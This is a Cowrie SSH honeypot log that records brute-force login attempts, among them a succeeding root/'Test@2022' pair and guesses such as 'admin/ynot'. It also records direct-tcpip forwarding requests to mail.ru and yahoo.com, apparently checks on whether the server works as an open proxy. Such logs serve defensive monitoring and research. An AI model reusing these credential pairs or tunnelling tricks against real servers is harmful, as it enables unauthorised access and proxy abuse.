{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64985,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5f47c74da2d","protocol":"ssh","message":"New connection: 77.83.207.83:64985 (1.2.3.4:22) [session: f5f47c74da2d]","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.819502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.820518Z","src_ip":"77.83.207.83","session":"f5f47c74da2d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:03.870721Z","src_ip":"77.83.207.83","session":"f5f47c74da2d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.118569Z","src_ip":"77.83.207.83","session":"f5f47c74da2d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13085,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13085","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.169136Z","session":"f5f47c74da2d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.219687Z","src_ip":"77.83.207.83","session":"f5f47c74da2d"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abcd123","message":"login attempt [yue/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.337913Z","src_ip":"212.227.125.160","session":"bb2763f56c6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":10777,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10777","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.360044Z","session":"f5f47c74da2d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.409777Z","src_ip":"77.83.207.83","session":"f5f47c74da2d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":23948,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:23948","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.552079Z","session":"f5f47c74da2d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"youandme","message":"login attempt [admin/youandme] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.558361Z","src_ip":"212.227.125.160","session":"124b28fd63c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.601667Z","src_ip":"77.83.207.83","session":"f5f47c74da2d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.652209Z","src_ip":"77.83.207.83","session":"f5f47c74da2d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1095,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c00ac0a7d8e","protocol":"ssh","message":"New connection: 77.83.207.83:1095 (1.2.3.4:22) [session: 0c00ac0a7d8e]","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.701561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.702490Z","src_ip":"77.83.207.83","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:04.753209Z","src_ip":"77.83.207.83","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.004724Z","src_ip":"77.83.207.83","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17011,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17011","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.056056Z","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.106371Z","src_ip":"77.83.207.83","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25501,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:25501","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.248804Z","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.299195Z","src_ip":"77.83.207.83","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":8160,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8160","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.440625Z","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abcd1234","message":"login attempt [yue/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.442700Z","src_ip":"212.227.125.160","session":"bb2763f56c6c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.491152Z","src_ip":"77.83.207.83","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.542547Z","src_ip":"77.83.207.83","session":"0c00ac0a7d8e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1176,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7c47e9df944","protocol":"ssh","message":"New connection: 77.83.207.83:1176 (1.2.3.4:22) [session: f7c47e9df944]","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.592220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.593317Z","src_ip":"77.83.207.83","session":"f7c47e9df944"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ynot","message":"login attempt [admin/ynot] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.619237Z","src_ip":"212.227.125.160","session":"124b28fd63c8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.643530Z","src_ip":"77.83.207.83","session":"f7c47e9df944"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.893976Z","src_ip":"77.83.207.83","session":"f7c47e9df944"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22276,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22276","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.945321Z","session":"f7c47e9df944"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:05.996008Z","src_ip":"77.83.207.83","session":"f7c47e9df944"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":25313,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:25313","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.136692Z","session":"f7c47e9df944"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.187534Z","src_ip":"77.83.207.83","session":"f7c47e9df944"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":26239,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26239","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.328794Z","session":"f7c47e9df944"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.379195Z","src_ip":"77.83.207.83","session":"f7c47e9df944"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.430049Z","src_ip":"77.83.207.83","session":"f7c47e9df944"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1250,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a3872bbafea","protocol":"ssh","message":"New connection: 77.83.207.83:1250 (1.2.3.4:22) [session: 6a3872bbafea]","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.479185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.489362Z","src_ip":"77.83.207.83","session":"6a3872bbafea"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abc1234","message":"login attempt [yue/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.524259Z","src_ip":"212.227.125.160","session":"bb2763f56c6c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.529499Z","src_ip":"77.83.207.83","session":"6a3872bbafea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"yfnfitymrf","message":"login attempt [admin/yfnfitymrf] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.680820Z","src_ip":"212.227.125.160","session":"124b28fd63c8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.780593Z","src_ip":"77.83.207.83","session":"6a3872bbafea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2884,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2884","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.831883Z","session":"6a3872bbafea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:06.882213Z","src_ip":"77.83.207.83","session":"6a3872bbafea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17513,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17513","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.024682Z","session":"6a3872bbafea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.075055Z","src_ip":"77.83.207.83","session":"6a3872bbafea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":13141,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:13141","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.216629Z","session":"6a3872bbafea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.267024Z","src_ip":"77.83.207.83","session":"6a3872bbafea"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.318069Z","src_ip":"77.83.207.83","session":"6a3872bbafea"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":1329,"dst_ip":"1.2.3.4","dst_port":22,"session":"c671e5eda088","protocol":"ssh","message":"New connection: 77.83.207.83:1329 (1.2.3.4:22) [session: c671e5eda088]","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.366701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.367516Z","src_ip":"77.83.207.83","session":"c671e5eda088"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.417522Z","src_ip":"77.83.207.83","session":"c671e5eda088"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:07.606453Z","src_ip":"212.227.125.160","session":"bb2763f56c6c"}
